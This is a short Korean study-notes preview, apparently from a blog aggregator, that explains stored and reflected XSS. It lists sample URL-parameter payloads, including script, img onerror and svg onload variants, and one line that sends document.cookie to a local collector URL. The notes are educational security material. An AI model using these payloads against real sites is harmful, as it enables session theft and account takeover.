Client Side Attack

Client Side Attack → xss, csrf 등 - XSS(Cross Site Scripting) - Stored XSS: 악의적인 사용자가 게시판이나 사용자 프로필에 악성 스크립트를 저장. (악성 스크립트가 서버 내에 db, 파일 등의 형태로 저장됨) 그것을 조회했을 때 의도치 않은 동작 실행. - Reflect XSS: URL 파라미터에 스크립트를 넣어 (서버에 저장하지 않고) 즉시 스크립트를 실행. ex; 게시물 조회 URL에서 XSS 확인 - ?param=<script>alert(1)</script> - ?param=<image src="img"> - ?param=<img src="#" onerror="alert(1)"> - ?param=<svg/onload="alert(1)"> -<script>window.open('http://127.0.0.1:8000/memo?memo='+document.cookie)</script> -<image src="location.h...

#Client_Side_Attack #CSRF #XSS

원문링크 : Client Side Attack

등록된 다른 글

Client Side Attack

등록된 다른 글

Webhacking.kr | Challenge 11

Python 기초 100제 | 6008번

Python 기초 100제 | 6087번

setTimeout()

Python 기초 100제 | 6021번

Python 기초 100제 | 6072번

Python 기초 100제 | 6022번

static 변수

키자드 로그인

키자드

네이버 블로그

티스토리

커뮤니티